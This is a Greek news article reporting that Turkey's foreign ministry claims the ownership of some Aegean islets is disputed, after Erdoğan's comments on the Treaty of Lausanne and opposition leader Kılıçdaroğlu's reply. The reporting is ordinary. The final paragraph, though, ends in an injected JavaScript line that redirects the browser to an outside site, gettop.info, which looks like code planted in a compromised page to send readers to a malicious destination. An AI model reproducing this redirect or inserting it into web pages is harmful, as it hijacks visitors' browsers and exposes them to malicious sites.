Τουρκικό ΥΠΕΞ: Πρόβλημα κυριότητας για νησίδες του Αιγαίου

0
11

 

Χωρίς τέλος είναι η αντιπαράθεση στο εσωτερικό της Τουρκίας μετά τις δηλώσεις του προέδρου Ταγίπ Ερντογάν για τη συνθήκη της Λωζάννης, με την αντίδραση του αρχηγού της αξιωματικής αντιπολίτευσης Κεμάλ Κιλιτσντάρογλου και τώρα το υπουργείο Εξωτερικών να δίνει συνέχεια κάνοντας αναφορά σε πρόβλημα κυριότητας νησίδων και βραχονησίδων στο Αιγαίο.

Ο αρχηγός της αξιωματικής αντιπολίτευσης χαρακτήρισε «απαράδεκτες» τις δηλώσεις του Τούρκου προέδρου λέγοντας χαρακτηριστικά: «Ας κοιτάξει πρώτα τα 16 νησιά που επί των ημερών του παραδόθηκαν και όπου υψώθηκε η ελληνική σημαία».

Το τούρκικο υπουργείο Εξωτερικών σε ανακοίνωσή του χαρακτηρίζει αναληθείς τις καταγγελίες περί μεταβίβασης της κυριαρχίας νησιών ή νησίδων στο Αιγαίο σε άλλη χώρα μετά το έτος 2003.

Υπογραμμίζει ωστόσο ότι είναι γεγονός ότι υπάρχει μια σειρά από αλληλένδετα προβλήματα σε σχέση με το Αιγαίο, κάτι που αποτελεί και πάγια γραμμή της τουρκικής εξωτερικής πολιτικής απέναντι στην κυριότητα ορισμένων νησιών στο Αιγαίο.

Μεταξύ των προβλημάτων περιλαμβάνεται και η κυριότητα ορισμένων νησίδων και βραχονησίδων στο Αιγαίο και σε σύνδεση με αυτό, το ότι, σύμφωνα με την Άγκυρα, δεν υπάρχουν μεταξύ της Τουρκίας και της Ελλάδας θαλάσσια σύνορα που να έχουν καθοριστεί με διεθνή συμφωνία που έχει ισχύ.

«Όπως είναι γνωστό, τα ζητήματα του Αιγαίου εξετάζονται στο πλαίσιο των υφιστάμενων μηχανισμών διαλόγου με την Ελλάδα…τα τελευταία 13 χρόνια δεν υπήρξε αλλαγή ως προς το καθεστώς των νησίδων, των νησίδων και των βραχονησίδων στο Αιγαίο» καταλήγει στην ανακοίνωση του το τουρκικό ΥΠΕΞ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here